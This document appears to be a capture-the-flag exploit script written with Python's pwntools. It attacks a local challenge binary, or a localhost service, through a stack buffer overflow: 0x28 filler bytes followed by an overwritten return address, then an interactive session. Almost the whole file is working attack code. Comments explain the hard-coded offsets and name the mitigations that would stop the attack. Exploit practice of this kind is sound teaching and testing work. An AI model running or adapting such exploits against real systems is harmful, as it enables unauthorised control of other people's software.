#!/usr/bin/python3
from pwn import *
# Local paths: the binary under test and the libc it is expected to load.
filename = "./pwn"
libcname = "/lib/x86_64-linux-gnu/libc.so.6"

# Endpoint that start() connects to when the script is run with REMOTE.
host = 'localhost'
port = 7777

# Load the target once and register it as the pwntools context binary, so
# packing helpers such as p64() follow the ELF's architecture settings.
elf = ELF(filename)
context.binary = elf

# Terminal command pwntools uses when it has to open a debugger window.
context.terminal = ['tmux', 'neww']

# libc is only defined when a path is configured; nothing else in this
# script reads it.
if libcname:
    libc = ELF(libcname)

# GDB commands passed to gdb.debug() by start(): break at main.
gs = '''
b main
'''
def start():
    """Open the tube used to talk to the target.

    The mode comes from pwntools' command-line ``args``:

    * ``GDB``    - run the local binary under gdb with the ``gs`` script.
    * ``REMOTE`` - connect to ``host``:``port``.
    * neither    - spawn the local binary as a plain process.

    Returns:
        The pwntools tube returned by gdb.debug(), remote() or process().
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    return process(elf.path)
p = start()

# One line of input: 0x28 filler bytes followed by a packed 64-bit value.
# NOTE(review): both numbers are hard-coded for one specific build of ./pwn.
# Presumably 0x28 is the distance from the input buffer to the saved return
# address and 0x4011f6 is a code address in a non-PIE binary - confirm against
# the target. A build with stack canaries or PIE enabled would invalidate both
# values, which is why those mitigations matter for this bug class.
padding = b'a' * 0x28
packed_address = p64(0x4011f6)
p.sendline(padding + packed_address)

# Hand the tube over to the terminal for manual interaction.
p.interactive()